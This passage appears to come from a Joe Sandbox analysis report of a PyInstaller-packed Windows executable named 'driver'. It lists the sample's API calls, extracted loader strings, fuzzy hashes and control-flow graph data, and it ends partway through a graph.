                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467837155.00007FF6A29EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467837155.00007FF6A29F2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467942191.00007FF6A29F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff6a29b0000_driver.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: CurrentProcess
                                                                                                                                                                                                                                                • String ID: Failed to create symbolic link %s!$Failed to extract %s: failed to allocate temporary buffer!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to open target file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$Failed to extract %s: failed to write data chunk!$fopen$fread$fseek$fwrite$malloc
                                                                                                                                                                                                                                                • API String ID: 2050909247-1550345328
                                                                                                                                                                                                                                                • Opcode ID: 607fb3d22e1abd3d0ea9d943795872ea3e60594e8e3d1f768179a624c21a25df
                                                                                                                                                                                                                                                • Instruction ID: d47d60451200b6bfc848e0532d6d9e2ab77ffb955b8ce996f5f3577a18d1f497
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 607fb3d22e1abd3d0ea9d943795872ea3e60594e8e3d1f768179a624c21a25df
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B8519A21B8A64692FA10AB63E4601A963A1BF44F9CF444131EE0C87B97DFBCF555B740

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • GetTempPathW.KERNEL32(?,?,00000000,00007FF6A29B3CBB), ref: 00007FF6A29B88F4
                                                                                                                                                                                                                                                • GetCurrentProcessId.KERNEL32(?,00000000,00007FF6A29B3CBB), ref: 00007FF6A29B88FA
                                                                                                                                                                                                                                                • CreateDirectoryW.KERNELBASE(?,00000000,00007FF6A29B3CBB), ref: 00007FF6A29B893C
                                                                                                                                                                                                                                                  • Part of subcall function 00007FF6A29B8A20: GetEnvironmentVariableW.KERNEL32(00007FF6A29B388E), ref: 00007FF6A29B8A57
                                                                                                                                                                                                                                                  • Part of subcall function 00007FF6A29B8A20: ExpandEnvironmentStringsW.KERNEL32 ref: 00007FF6A29B8A79
                                                                                                                                                                                                                                                  • Part of subcall function 00007FF6A29C82A8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6A29C82C1
                                                                                                                                                                                                                                                  • Part of subcall function 00007FF6A29B2810: MessageBoxW.USER32 ref: 00007FF6A29B28EA
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2467579900.00007FF6A29B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6A29B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467463133.00007FF6A29B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467747299.00007FF6A29DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467837155.00007FF6A29EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467837155.00007FF6A29F2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467942191.00007FF6A29F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff6a29b0000_driver.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Environment$CreateCurrentDirectoryExpandMessagePathProcessStringsTempVariable_invalid_parameter_noinfo
                                                                                                                                                                                                                                                • String ID: LOADER: failed to set the TMP environment variable.$LOADER: length of teporary directory path exceeds maximum path length!$TMP$TMP$_MEI%d
                                                                                                                                                                                                                                                • API String ID: 3563477958-1339014028
                                                                                                                                                                                                                                                • Opcode ID: 4e349524156a31c65ddba45994ef87c37bf84ce1b0e485ec316371ea64373d4f
                                                                                                                                                                                                                                                • Instruction ID: 373c8950d62d497dac01f4c9953196defd2f6d09158d483b887f0ea2bbc31112
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4e349524156a31c65ddba45994ef87c37bf84ce1b0e485ec316371ea64373d4f
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: BA41A012B9B64245FE11AB67A9552FA1291BF8DFC8F400031ED0DC779BDEBCE501A301

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                control_flow_graph 599 7ff6a29b1210-7ff6a29b126d call 7ff6a29bbdf0 602 7ff6a29b126f-7ff6a29b1296 call 7ff6a29b2710 599->602 603 7ff6a29b1297-7ff6a29b12af call 7ff6a29c4fb4 599->603 608 7ff6a29b12b1-7ff6a29b12cf call 7ff6a29c4f78 call 7ff6a29b2910 603->608 609 7ff6a29b12d4-7ff6a29b12e4 call 7ff6a29c4fb4 603->609 621 7ff6a29b1439-7ff6a29b144e call 7ff6a29bbad0 call 7ff6a29c4fa0 * 2 608->621 615 7ff6a29b1309-7ff6a29b131b 609->615 616 7ff6a29b12e6-7ff6a29b1304 call 7ff6a29c4f78 call 7ff6a29b2910 609->616 617 7ff6a29b1320-7ff6a29b1345 call 7ff6a29c040c 615->617 616->621 628 7ff6a29b1431 617->628 629 7ff6a29b134b-7ff6a29b1355 call 7ff6a29c0180 617->629 636 7ff6a29b1453-7ff6a29b146d 621->636 628->621 629->628 635 7ff6a29b135b-7ff6a29b1367 629->635 637 7ff6a29b1370-7ff6a29b1398 call 7ff6a29ba230 635->637 640 7ff6a29b1416-7ff6a29b142c call 7ff6a29b2710 637->640 641 7ff6a29b139a-7ff6a29b139d 637->641 640->628 643 7ff6a29b1411 641->643 644 7ff6a29b139f-7ff6a29b13a9 641->644 643->640 645 7ff6a29b13d4-7ff6a29b13d7 644->645 646 7ff6a29b13ab-7ff6a29b13b9 call 7ff6a29c0b4c 644->646 647 7ff6a29b13d9-7ff6a29b13e7 call 7ff6a29d9ea0 645->647 648 7ff6a29b13ea-7ff6a29b13ef 645->648 650 7ff6a29b13be-7ff6a29b13c1 646->650 647->648 648->637 652 7ff6a29b13f5-7ff6a29b13f8 648->652 653 7ff6a29b13cf-7ff6a29b13d2 650->653 654 7ff6a29b13c3-7ff6a29b13cd call 7ff6a29c0180 650->654 656 7ff6a29b140c-7ff6a29b140f 652->656 657 7ff6a29b13fa-7ff6a29b13fd 652->657 653->640 654->648 654->653 656->628 657->640 659 7ff6a29b13ff-7ff6a29b1407 657->659 659->617
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2467579900.00007FF6A29B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6A29B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467463133.00007FF6A29B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467747299.00007FF6A29DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467837155.00007FF6A29EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467837155.00007FF6A29F2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467942191.00007FF6A29F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff6a29b0000_driver.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: CurrentProcess
                                                                                                                                                                                                                                                • String ID: 1.3.1$Failed to extract %s: decompression resulted in return code %d!$Failed to extract %s: failed to allocate temporary input buffer!$Failed to extract %s: failed to allocate temporary output buffer!$Failed to extract %s: inflateInit() failed with return code %d!$malloc
                                                                                                                                                                                                                                                • API String ID: 2050909247-2813020118
                                                                                                                                                                                                                                                • Opcode ID: 15fc9c742c9fb12a8c4ab664e8e5c311509e27342d3a39e207e1bde7a43e7c65
                                                                                                                                                                                                                                                • Instruction ID: 00d43df6436f02759240de2d845d39454300c9a40c99d6ae1f0535fa5bbe4620
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 15fc9c742c9fb12a8c4ab664e8e5c311509e27342d3a39e207e1bde7a43e7c65
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6C51C322A4A64286EA609B13A4503BA6291FF85F98F844135ED4DC7BD7EFBCE501E700

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • FreeLibrary.KERNEL32(?,?,?,00007FF6A29CF11A,?,?,-00000018,00007FF6A29CADC3,?,?,?,00007FF6A29CACBA,?,?,?,00007FF6A29C5FAE), ref: 00007FF6A29CEEFC
                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(?,?,?,00007FF6A29CF11A,?,?,-00000018,00007FF6A29CADC3,?,?,?,00007FF6A29CACBA,?,?,?,00007FF6A29C5FAE), ref: 00007FF6A29CEF08
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2467579900.00007FF6A29B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6A29B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467463133.00007FF6A29B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467747299.00007FF6A29DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467837155.00007FF6A29EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467837155.00007FF6A29F2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467942191.00007FF6A29F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff6a29b0000_driver.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: AddressFreeLibraryProc
                                                                                                                                                                                                                                                • String ID: api-ms-$ext-ms-
                                                                                                                                                                                                                                                • API String ID: 3013587201-537541572
                                                                                                                                                                                                                                                • Opcode ID: 2820b76ab0802fc58bac5aaef12ed6f6fffcf0c29b30edae647068643d5e49cf
                                                                                                                                                                                                                                                • Instruction ID: e8aba44b315e9c6144e1426126274685ff4973418fb03f16126bd091c7a368a6
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2820b76ab0802fc58bac5aaef12ed6f6fffcf0c29b30edae647068643d5e49cf
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 66412361B9AA0245FA15CB1798106752291BF49FD8F884139ED5EC778AEEBCF804A300

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • GetModuleFileNameW.KERNEL32(?,00007FF6A29B3804), ref: 00007FF6A29B36E1
                                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,00007FF6A29B3804), ref: 00007FF6A29B36EB
                                                                                                                                                                                                                                                  • Part of subcall function 00007FF6A29B2C50: GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,00007FF6A29B3706,?,00007FF6A29B3804), ref: 00007FF6A29B2C9E
                                                                                                                                                                                                                                                  • Part of subcall function 00007FF6A29B2C50: FormatMessageW.KERNEL32(?,?,?,?,?,?,?,?,00007FF6A29B3706,?,00007FF6A29B3804), ref: 00007FF6A29B2D63
                                                                                                                                                                                                                                                  • Part of subcall function 00007FF6A29B2C50: MessageBoxW.USER32 ref: 00007FF6A29B2D99
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2467579900.00007FF6A29B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6A29B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467463133.00007FF6A29B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467747299.00007FF6A29DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467837155.00007FF6A29EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467837155.00007FF6A29F2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467942191.00007FF6A29F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff6a29b0000_driver.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Message$CurrentErrorFileFormatLastModuleNameProcess
                                                                                                                                                                                                                                                • String ID: Failed to convert executable path to UTF-8.$Failed to obtain executable path.$Failed to resolve full path to executable %ls.$GetModuleFileNameW$\\?\
                                                                                                                                                                                                                                                • API String ID: 3187769757-2863816727
                                                                                                                                                                                                                                                • Opcode ID: 6d8fde842cedad8fbf80b9c4aa3ce336361ac9392ce2c79ae57a11131fda94fc
                                                                                                                                                                                                                                                • Instruction ID: a38038be8dc44f9f10bcded8a5fb8c6cbd58bcb52eb1dff2abb6d5f16e8876be
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6d8fde842cedad8fbf80b9c4aa3ce336361ac9392ce2c79ae57a11131fda94fc
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F421B661F9E64281FA20D722E8513BA2294FF88F9DF804136E55DC29D7EEACE504E704

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                control_flow_graph 744 7ff6a29cbacc-7ff6a29cbaf2 745 7ff6a29cbaf4-7ff6a29cbb08 call 7ff6a29c4f58 call 7ff6a29c4f78 744->745 746 7ff6a29cbb0d-7ff6a29cbb11 744->746 760 7ff6a29cbefe 745->760 747 7ff6a29cbee7-7ff6a29cbef3 call 7ff6a29c4f58 call 7ff6a29c4f78 746->747 748 7ff6a29cbb17-7ff6a29cbb1e 746->748 767 7ff6a29cbef9 call 7ff6a29ca950 747->767 748->747 751 7ff6a29cbb24-7ff6a29cbb52 748->751 751->747 754 7ff6a29cbb58-7ff6a29cbb5f 751->754 757 7ff6a29cbb61-7ff6a29cbb73 call 7ff6a29c4f58 call 7ff6a29c4f78 754->757 758 7ff6a29cbb78-7ff6a29cbb7b 754->758 757->767 763 7ff6a29cbee3-7ff6a29cbee5 758->763 764 7ff6a29cbb81-7ff6a29cbb87 758->764 765 7ff6a29cbf01-7ff6a29cbf18 760->765 763->765 764->763 768 7ff6a29cbb8d-7ff6a29cbb90 764->768 767->760 768->757 771 7ff6a29cbb92-7ff6a29cbbb7 768->771 772 7ff6a29cbbea-7ff6a29cbbf1 771->772 773 7ff6a29cbbb9-7ff6a29cbbbb 771->773 777 7ff6a29cbbf3-7ff6a29cbc1b call 7ff6a29cd66c call 7ff6a29ca9b8 * 2 772->777 778 7ff6a29cbbc6-7ff6a29cbbdd call 7ff6a29c4f58 call 7ff6a29c4f78 call 7ff6a29ca950 772->778 775 7ff6a29cbbe2-7ff6a29cbbe8 773->775 776 7ff6a29cbbbd-7ff6a29cbbc4 773->776 780 7ff6a29cbc68-7ff6a29cbc7f 775->780 776->775 776->778 805 7ff6a29cbc1d-7ff6a29cbc33 call 7ff6a29c4f78 call 7ff6a29c4f58 777->805 806 7ff6a29cbc38-7ff6a29cbc63 call 7ff6a29cc2f4 777->806 809 7ff6a29cbd70 778->809 783 7ff6a29cbc81-7ff6a29cbc89 780->783 784 7ff6a29cbcfa-7ff6a29cbd04 call 7ff6a29d398c 780->784 783->784 788 7ff6a29cbc8b-7ff6a29cbc8d 783->788 796 7ff6a29cbd8e 784->796 797 7ff6a29cbd0a-7ff6a29cbd1f 784->797 788->784 792 7ff6a29cbc8f-7ff6a29cbca5 788->792 792->784 798 7ff6a29cbca7-7ff6a29cbcb3 792->798 800 7ff6a29cbd93-7ff6a29cbdb3 ReadFile 796->800 797->796 802 7ff6a29cbd21-7ff6a29cbd33 GetConsoleMode 797->802 798->784 803 7ff6a29cbcb5-7ff6a29cbcb7 798->803 807 7ff6a29cbead-7ff6a29cbeb6 GetLastError 800->807 808 7ff6a29cbdb9-7ff6a29cbdc1 800->808 802->796 810 7ff6a29cbd35-7ff6a29cbd3d 802->810 803->784 804 7ff6a29cbcb9-7ff6a29cbcd1 803->804 804->784 811 7ff6a29cbcd3-7ff6a29cbcdf 804->811 805->809 806->780 816 7ff6a29cbed3-7ff6a29cbed6 807->816 817 7ff6a29cbeb8-7ff6a29cbece call 7ff6a29c4f78 call 7ff6a29c4f58 807->817 808->807 813 7ff6a29cbdc7 808->813 818 7ff6a29cbd73-7ff6a29cbd7d call 7ff6a29ca9b8 809->818 810->800 815 7ff6a29cbd3f-7ff6a29cbd61 ReadConsoleW 810->815 811->784 820 7ff6a29cbce1-7ff6a29cbce3 811->820 824 7ff6a29cbdce-7ff6a29cbde3 813->824 826 7ff6a29cbd82-7ff6a29cbd8c 815->826 827 7ff6a29cbd63 GetLastError 815->827 821 7ff6a29cbedc-7ff6a29cbede 816->821 822 7ff6a29cbd69-7ff6a29cbd6b call 7ff6a29c4eec 816->822 817->809 818->765 820->784 830 7ff6a29cbce5-7ff6a29cbcf5 820->830 821->818 822->809 824->818 832 7ff6a29cbde5-7ff6a29cbdf0 824->832 826->824 827->822 830->784 837 7ff6a29cbdf2-7ff6a29cbe0b call 7ff6a29cb6e4 832->837 838 7ff6a29cbe17-7ff6a29cbe1f 832->838 844 7ff6a29cbe10-7ff6a29cbe12 837->844 841 7ff6a29cbe21-7ff6a29cbe33 838->841 842 7ff6a29cbe9b-7ff6a29cbea8 call 7ff6a29cb524 838->842 845 7ff6a29cbe35 841->845 846 7ff6a29cbe8e-7ff6a29cbe96 841->846 842->844 844->818 848 7ff6a29cbe3a-7ff6a29cbe41 845->848 846->818 849 7ff6a29cbe43-7ff6a29cbe47 848->849 850 7ff6a29cbe7d-7ff6a29cbe88 848->850 851 7ff6a29cbe63 849->851 852 7ff6a29cbe49-7ff6a29cbe50 849->852 850->846 854 7ff6a29cbe69-7ff6a29cbe79 851->854 852->851 853 7ff6a29cbe52-7ff6a29cbe56 852->853 853->851 855 7ff6a29cbe58-7ff6a29cbe61 853->855 854->848 856 7ff6a29cbe7b 854->856 855->854 856->846
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2467579900.00007FF6A29B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6A29B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467463133.00007FF6A29B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467747299.00007FF6A29DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467837155.00007FF6A29EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467837155.00007FF6A29F2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467942191.00007FF6A29F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff6a29b0000_driver.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 3215553584-0
                                                                                                                                                                                                                                                • Opcode ID: 07c5dcf76cbe3182a9f46e495b791f87a2923bbe72b553d2f04cfdf557d03735
                                                                                                                                                                                                                                                • Instruction ID: c0caccf4c443a235cef339b66d8bafa4e06562aa49e1c3b48daffdc604db38c5
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 07c5dcf76cbe3182a9f46e495b791f87a2923bbe72b553d2f04cfdf557d03735
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 58C1F662A8E68649E7609B1790202BE7752EF80F88F554131EA4E837D3CFFCF855A340

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2467579900.00007FF6A29B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6A29B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467463133.00007FF6A29B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467747299.00007FF6A29DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467837155.00007FF6A29EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467837155.00007FF6A29F2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467942191.00007FF6A29F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff6a29b0000_driver.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Token$InformationProcess$CloseConvertCurrentErrorHandleLastOpenString
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 995526605-0
                                                                                                                                                                                                                                                • Opcode ID: ccba17952e233d5b695068aab9421341a55ed3ebff0a2a14ee99ad80d8ea5500
                                                                                                                                                                                                                                                • Instruction ID: 41ece37a4328fe3f6e51a6a49f81d5a84e2f04b7c11ff0dbe27ce9ef364b58b6
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ccba17952e233d5b695068aab9421341a55ed3ebff0a2a14ee99ad80d8ea5500
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 06217431B4D64242EB109B96F45423AA3E1FF85FA8F500235EA6D83AEADFFCD4449700

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                  • Part of subcall function 00007FF6A29B8760: GetCurrentProcess.KERNEL32 ref: 00007FF6A29B8780
                                                                                                                                                                                                                                                  • Part of subcall function 00007FF6A29B8760: OpenProcessToken.ADVAPI32 ref: 00007FF6A29B8793
                                                                                                                                                                                                                                                  • Part of subcall function 00007FF6A29B8760: GetTokenInformation.KERNELBASE ref: 00007FF6A29B87B8
                                                                                                                                                                                                                                                  • Part of subcall function 00007FF6A29B8760: GetLastError.KERNEL32 ref: 00007FF6A29B87C2
                                                                                                                                                                                                                                                  • Part of subcall function 00007FF6A29B8760: GetTokenInformation.KERNELBASE ref: 00007FF6A29B8802
                                                                                                                                                                                                                                                  • Part of subcall function 00007FF6A29B8760: ConvertSidToStringSidW.ADVAPI32 ref: 00007FF6A29B881E
                                                                                                                                                                                                                                                  • Part of subcall function 00007FF6A29B8760: CloseHandle.KERNEL32 ref: 00007FF6A29B8836
                                                                                                                                                                                                                                                • LocalFree.KERNEL32(?,00007FF6A29B3C55), ref: 00007FF6A29B916C
                                                                                                                                                                                                                                                • LocalFree.KERNEL32(?,00007FF6A29B3C55), ref: 00007FF6A29B9175
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2467579900.00007FF6A29B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6A29B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467463133.00007FF6A29B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467747299.00007FF6A29DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467837155.00007FF6A29EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467837155.00007FF6A29F2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467942191.00007FF6A29F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff6a29b0000_driver.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Token$FreeInformationLocalProcess$CloseConvertCurrentErrorHandleLastOpenString
                                                                                                                                                                                                                                                • String ID: D:(A;;FA;;;%s)$D:(A;;FA;;;%s)(A;;FA;;;%s)$S-1-3-4$Security descriptor string length exceeds PYI_PATH_MAX!
                                                                                                                                                                                                                                                • API String ID: 6828938-1529539262
                                                                                                                                                                                                                                                • Opcode ID: 44a76ac2d965b652da6d7152683ffc914eb32e79e00aec7a7a922ce7c9633e88
                                                                                                                                                                                                                                                • Instruction ID: 61ea2e333c8ae59a66370b6b33421511b738edf6cd7ec0991e42372fcaa7f86f
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 44a76ac2d965b652da6d7152683ffc914eb32e79e00aec7a7a922ce7c9633e88
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9E218031A5A74286F710AB22E5152EA63A1FF88B88F444035EA4DD7787DFBCD805A750

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                control_flow_graph 963 7ff6a29ccfd0-7ff6a29ccff5 964 7ff6a29cd2c3 963->964 965 7ff6a29ccffb-7ff6a29ccffe 963->965 966 7ff6a29cd2c5-7ff6a29cd2d5 964->966 967 7ff6a29cd000-7ff6a29cd032 call 7ff6a29ca884 965->967 968 7ff6a29cd037-7ff6a29cd063 965->968 967->966 969 7ff6a29cd065-7ff6a29cd06c 968->969 970 7ff6a29cd06e-7ff6a29cd074 968->970 969->967 969->970 973 7ff6a29cd084-7ff6a29cd099 call 7ff6a29d398c 970->973 974 7ff6a29cd076-7ff6a29cd07f call 7ff6a29cc390 970->974 978 7ff6a29cd1b3-7ff6a29cd1bc 973->978 979 7ff6a29cd09f-7ff6a29cd0a8 973->979 974->973 980 7ff6a29cd1be-7ff6a29cd1c4 978->980 981 7ff6a29cd210-7ff6a29cd235 WriteFile 978->981 979->978 982 7ff6a29cd0ae-7ff6a29cd0b2 979->982 985 7ff6a29cd1fc-7ff6a29cd20e call 7ff6a29cca88 980->985 986 7ff6a29cd1c6-7ff6a29cd1c9 980->986 983 7ff6a29cd240 981->983 984 7ff6a29cd237-7ff6a29cd23d GetLastError 981->984 987 7ff6a29cd0c3-7ff6a29cd0ce 982->987 988 7ff6a29cd0b4-7ff6a29cd0bc call 7ff6a29c4830 982->988 990 7ff6a29cd243 983->990 984->983 1006 7ff6a29cd1a0-7ff6a29cd1a7 985->1006 991 7ff6a29cd1cb-7ff6a29cd1ce 986->991 992 7ff6a29cd1e8-7ff6a29cd1fa call 7ff6a29ccca8 986->992 994 7ff6a29cd0df-7ff6a29cd0f4 GetConsoleMode 987->994 995 7ff6a29cd0d0-7ff6a29cd0d9 987->995 988->987 999 7ff6a29cd248 990->999 1000 7ff6a29cd254-7ff6a29cd25e 991->1000 1001 7ff6a29cd1d4-7ff6a29cd1e6 call 7ff6a29ccb8c 991->1001 992->1006 996 7ff6a29cd0fa-7ff6a29cd100 994->996 997 7ff6a29cd1ac 994->997 995->978 995->994 1004 7ff6a29cd106-7ff6a29cd109 996->1004 1005 7ff6a29cd189-7ff6a29cd19b call 7ff6a29cc610 996->1005 997->978 1007 7ff6a29cd24d 999->1007 1008 7ff6a29cd260-7ff6a29cd265 1000->1008 1009 7ff6a29cd2bc-7ff6a29cd2c1 1000->1009 1001->1006 1012 7ff6a29cd114-7ff6a29cd122 1004->1012 1013 7ff6a29cd10b-7ff6a29cd10e 1004->1013 1005->1006 1006->999 1007->1000 1015 7ff6a29cd293-7ff6a29cd29d 1008->1015 1016 7ff6a29cd267-7ff6a29cd26a 1008->1016 1009->966 1020 7ff6a29cd124 1012->1020 1021 7ff6a29cd180-7ff6a29cd184 1012->1021 1013->1007 1013->1012 1018 7ff6a29cd2a4-7ff6a29cd2b3 1015->1018 1019 7ff6a29cd29f-7ff6a29cd2a2 1015->1019 1022 7ff6a29cd283-7ff6a29cd28e call 7ff6a29c4f34 